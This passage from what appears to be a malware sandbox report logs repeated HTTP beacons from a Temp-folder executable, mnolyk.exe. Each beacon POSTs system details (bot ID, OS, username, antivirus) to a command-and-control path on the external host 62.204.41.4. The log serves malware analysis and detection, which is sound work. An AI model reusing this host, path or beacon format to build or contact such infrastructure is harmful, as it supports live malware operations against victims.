                                                                      126 | 192.168.2.7 | 49821 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:33.782680988 CET | 241 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:33.847265005 CET | 241 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      127 | 192.168.2.7 | 49822 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:34.022866011 CET | 242 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:34.090245008 CET | 242 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      128 | 192.168.2.7 | 49823 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:34.268182993 CET | 243 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:34.332073927 CET | 243 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      129 | 192.168.2.7 | 49824 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:34.508276939 CET | 244 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:34.572290897 CET | 244 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      13 | 192.168.2.7 | 49707 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:04.724651098 CET | 117 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:04.789779902 CET | 117 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      130 | 192.168.2.7 | 49825 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:34.754203081 CET | 245 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:34.818792105 CET | 245 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      131 | 192.168.2.7 | 49826 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:34.986762047 CET | 246 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:35.052656889 CET | 246 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      132 | 192.168.2.7 | 49827 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:35.253284931 CET | 247 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:35.315601110 CET | 247 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      133 | 192.168.2.7 | 49828 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:35.504498005 CET | 248 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:35.568485022 CET | 248 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      134 | 192.168.2.7 | 49829 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:35.738938093 CET | 249 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:35.803982019 CET | 249 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      135 | 192.168.2.7 | 49830 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:35.970669031 CET | 250 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:36.035929918 CET | 250 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      136 | 192.168.2.7 | 49831 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:36.211397886 CET | 251 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:36.275892973 CET | 251 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      137 | 192.168.2.7 | 49832 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:36.601999998 CET | 252 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:36.665698051 CET | 252 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      138 | 192.168.2.7 | 49833 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:36.871623993 CET | 253 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:36.935492039 CET | 253 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      139 | 192.168.2.7 | 49834 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:37.138339043 CET | 254 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:37.202564001 CET | 254 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      14 | 192.168.2.7 | 49708 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:04.970650911 CET | 118 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:05.035841942 CET | 118 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      140 | 192.168.2.7 | 49835 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:37.902415991 CET | 255 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:37.965897083 CET | 255 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      141 | 192.168.2.7 | 49836 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:38.152612925 CET | 256 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:38.219290018 CET | 256 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      142 | 192.168.2.7 | 49837 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:38.971374989 CET | 257 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:39.035603046 CET | 257 | IN | HTTP/1.1 200 OK
